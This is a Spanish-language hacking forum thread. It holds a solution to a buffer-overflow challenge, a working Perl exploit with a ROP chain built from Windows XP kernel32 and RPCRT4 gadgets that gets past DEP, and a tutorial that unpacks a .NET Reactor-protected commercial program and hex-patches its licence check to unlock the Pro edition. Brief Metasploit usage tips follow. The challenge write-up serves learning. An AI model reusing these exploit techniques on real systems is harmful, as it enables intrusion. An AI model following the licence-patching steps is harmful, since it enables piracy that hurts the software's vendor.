Mensajes

Excelente idea, inclusive podría obtener el sistema operativo con nmap y con ello ver que cadena de ROP usar.

Lo de un nuevo post es para que no se pierda ya que si te percatas estos temas son poco usuales (quizás incentive a algún usuario).

Saludos y gracias por los consejos

http://foro.elhacker.net/bugs_y_exploits/solucion_server_vuln_de_harrytheblogger-t428358.0.html

[Solución Server Vuln de harry_the_blogger]

Solución Server Vuln de harry_the_blogger

Problema:
- Se debe lograr ejecutar dos funciones ocultas ubicadas en un ejecutable vulnerable a stack buffer overflow (desbordamiento de pila), por lo menos eso es lo que alude el ejecutable, harry_the_blogger no mencionó el objetivo del juego  .

Solución:
La idea principal es lograr modificar PC (program counter) que en este caso (arquitectura) es lo que apunta el registro EIP, para ello la composición del exploit sería el siguiente:

Código [Seleccionar] Expandir


- Basura ("A").
- Salto al stack (JMP ESP/PUSH ESP/RETN).
- Address función oculta 1 (0x40105E).
- Address función oculta 2 (0x401036).

[BASURA][SALTO AL STACK][ADDRESS FUNCION_OCULTA_1][RETORNO][ADDRESS FUNCION_OCULTA_2]

Esto se podría realizar, pero el problema que tendríamos principalmente serían las direcciones de las funciones ocultas ya que estas contienen bytes nulos (null bytes), lo cual nos "cortaría" el flujo de nuestro exploit, para ello tenemos como solución lo siguiente:

Código [Seleccionar] Expandir


- Basura ("A").
- Salto al stack (JMP ESP/PUSH ESP/RETN).
#----INICIO---Ejecución de código dentro del stack
- Mover las direcciones modificadas de las funciones ocultas a los registros (EJ: 0x401036 + 0x11111111h)
- Restar/sumar a las direcciones la modificación para que queden con su valor original.
- CALL Dirección oculta 1
- Call Dirección oculta 2
#----FIN -----Ejecución de código dentro del stack


Pero pfff y que ocurre con DEP ?  Si usáramos esta solución, el sistema no nos permitiría la ejecución de código en el stack (mecanismo de protección).

Solución final:
Como solución propuesta, se me ocurrió utilizar cadenas ROP lo cual nos permitirá ejecutar código del mismo ejecutable y módulos cargados, el cual terminará llamando a las dos funciones ocultas y evitando la protección DEP:

Código (perl) [Seleccionar] Expandir

# Operating system = Microsoft Windows XP Profesional Versión 2002 Service Pack 2
# Language         = Spanish
# Required DLL     = kernel32.dll | RPCRT4.dll
# Author           = UND3R

use strict;
use Socket;
my $junk = "\x41" x 64;
my $eip = pack('V', 0x7c87f30e); # kernel32.dll | POP EAX;POP EBP;RETN
my $hidden_two = pack('V', 0x373e47db); # 0x40105E - 0xC901C883 = 0x373E47DB
my $hidden_one = pack('V', 0x373e47b3); # 0x401036 - 0xC901C883 = 0x373E47B3
my $rop1 = pack('V', 0x7c80ad03); # kernel32.dll | ADD EAX,0xC901C883;RETN
my $rop2 = pack('V', 0x7c80b0eb); # kernel32.dll | XCHG EAX,EBP
my $rop3 = pack('V', 0x7c80ad03); # kernel32.dll | ADD EAX,0xC901C883;RETN
my $rop4 = pack('V', 0x77e61acc); # RPCRT4.dll | CALL EAX;RETN
my $rop5 = pack('V', 0x7c80b0eb); # kernel32.dll | XCHG EAX,EBP
my $rop6 = pack('V', 0x77e61acc); # RPCRT4.dll | CALL EAX;RETN

my $exploit = $junk . $eip . $hidden_two . $hidden_one . $rop1 . $rop2 . $rop3 . $rop4 . $rop5 . $rop6;

# initialize host and port
my $host = shift || 'localhost';
my $port = shift || 6666;

my $proto = getprotobyname('tcp');

# get the port address
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port, $iaddr);

print "[+] Setting up socket\n";
# create the socket, connect to the port
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
print "[+] Connecting to $host on port $port\n";
connect(SOCKET, $paddr) or die "connect: $!";

print "[+] Sending payload (size = " . length($exploit) . ") \n";
print SOCKET $exploit."\n";

print "[+] Payload sent\n";
close SOCKET or die "close: $!";

- ¿Es standard?
Lamentablemente no ya que utiliza dos DLL cargadas por el sistema (las mencioné en el exploit). No lo pude hacer standard/genérico ya que al ser un ejecutable muy sencillo y no contar con sus propias DLL se me fue imposible encontrar cadenas ROP dentro de él y tuve que buscar DLLs del sistema.

- Saludos y agradecimientos
harry_the_blogger genial amigo que manera de programa muy linda y nada mejor que postees este tipo de retos en el foro lo cual a mi criterio simplemente aporta conocimiento y a Don Videla que ya nos veremos.


Aquí una imagen de la ejecución del exploit, por cierto DEP arrancó pero luego de haber ejecutado las funciones ocultas (seguramente por el desbordamiento ocasionado):


PD: Voy en un bus viajando así que perdona si no me pude explicar bien, si tienes alguna duda, con gusto te respondo

Si mal no recuerde ese crackme no poseía ningún tipo de protección, si no es el caso has usado algún plugins como OllyAdvanced para bypassear la protecciones o algo loco pero válido, lo has intentado correr sin el depurador?

Saludos

Muy bueno .:UND3R:. !

Gracias por compartir!

Saludos!

PD: Voy a ser un poco malo y te voy a pedir una cosa: que lo pases a pdf y lo mandes a CLS (así queda disponible, por si vuelan las imagenes de los hostings.) 

Tendré que cumplir :/ jajaja llegando del viaje lo subo, gracias, saludos y abrazos

PD: el hosting es i.elhacker.net pero tienes razón, no está demás prevenir así que se va a CLS

No es para tanto, flamer me motivó, saludos

[Unpack .NET Reactor + Crack]

Unpack .NET Reactor + Crack
Iniciamos la aplicación y vemos la siguiente nag:


Si revisamos con RDG Packer detector en busca de información del ejecutable, obtenemos los siguiente:


por lo cual debemos enfrentarnos al packer para luego intentar crackear la aplicación, para desempaquetar .NET Reactor utilizaremos de4dot:


Intentamos localizar algún método sospechoso y encontramos "checkLic" el cual retorna true si existe licencia o false en caso contrario. Sabiendo eso buscamos en que lugar es usado el método y obtenemos lo siguiente:

MainFrm_Load()

Código (csharp) [Seleccionar] Expandir

}
       if (Class9.checkLic())
       {
           if (Operators.CompareString(Class9.string_3, "Basic Edition", false) == 0)
           {
               this.opt_MusicDuplicates.Enabled = false;
               this.opt_PatternDuplicates.Enabled = false;
               this.opt_MusicDuplicates.Values.ExtraText = "Not Available In Basic Edition";
               this.opt_PatternDuplicates.Values.ExtraText = "Not Available In Basic Edition";
               this.m_Activate.Text = "Activate Upgrade";
               this.m_BuyNow.Text = "Upgrade to Pro Edition";
           }
           else
           {
               this.m_Activate.Visible = false;
               this.m_BuyNow.Visible = false;
           }


Por lo cual si el método checkLic retornará siempre true gracias a la composición de las condiciones activaríamos el software en la versión Pro Edition. Ahora si modificamos checkLic (en realidad si realizamos cualquier modificación con SAE o Reflexil) obtenemos el siguiente mensaje de error:



Por lo cual me vi obligado a modificar los op code de forma manual (editor hexadecimal), para ello con IDA localicé el offset del método checkLic y me arrojó que era: 0x21DC8 tras dirigirme al inicio del método, este debía retornar siempre true:

Código [Seleccionar] Expandir

MSIL
L_004C516E:   ldc.i4.1 (OP CODES = 17)
L_004C516F:   ret (OP CODES = 2A)

por lo que en resumen si modificamos los primeros dos bytes del offset 0x21DC8 por 0x17 0x2A (172A) con un editor hexadecimal y guardamos los cambios, al iniciar el ejecutable obtendremos lo siguiente:

logré explotarlo (de forma temporal sin anti DEP) ya que lo compilé con gcc para Windows pero cada compilador y dependiendo de su configuración de parámetros compila de forma diferente, por lo cual mi exploit es funcional en mi vulnerable.c compilado.

¿Podrías subirlo a Mega, mediafiare u otro uploader?

Saludos

Antes que todo debes saber si el exploit es un módulo válido para metasploit, si es así debes ubicarte en la carpeta de instalación de metasploit, creo que es root/.msf4/
e introducirlo en su respectiva categoría EJ:

root/.msf4/exploit/windows/misexploit/elexploit.rb

miexploit es el nombre de una carpeta sugerida, pero puede ser cualquiera. y para llamarlo

use exploit/windows/miexploit/elexploit

show options para ver las opciones

set para establecerlas y exploit para lanzarlo

PD: si es un auxiliar debes usar RUN en vez de exploit

saludos

Gh057:

No sabrás alguna forma de hacer funcionar la shellcode?? Estoy trabajando en esto y me parece dificil. Ah, y en serio bloquean desde gogle??? Es un archivo que no está listado en internet, solo accesible por links.

No creo que cause algun problema, bueno, si alguna cosa más tarde lo actualizaré y subiré a Mega. Gracias por la advertencia. Puede el moderador bloquearlo?? Alguien me lo pidió.

Podrías subirlo a Mega no te aseguro nada pero quiero tener el ejecutable vulnerable compilado como lo tienes tú, quiero ver que puedo hacer (estoy muy oxidado en esta área y quiero retomar)

Saludos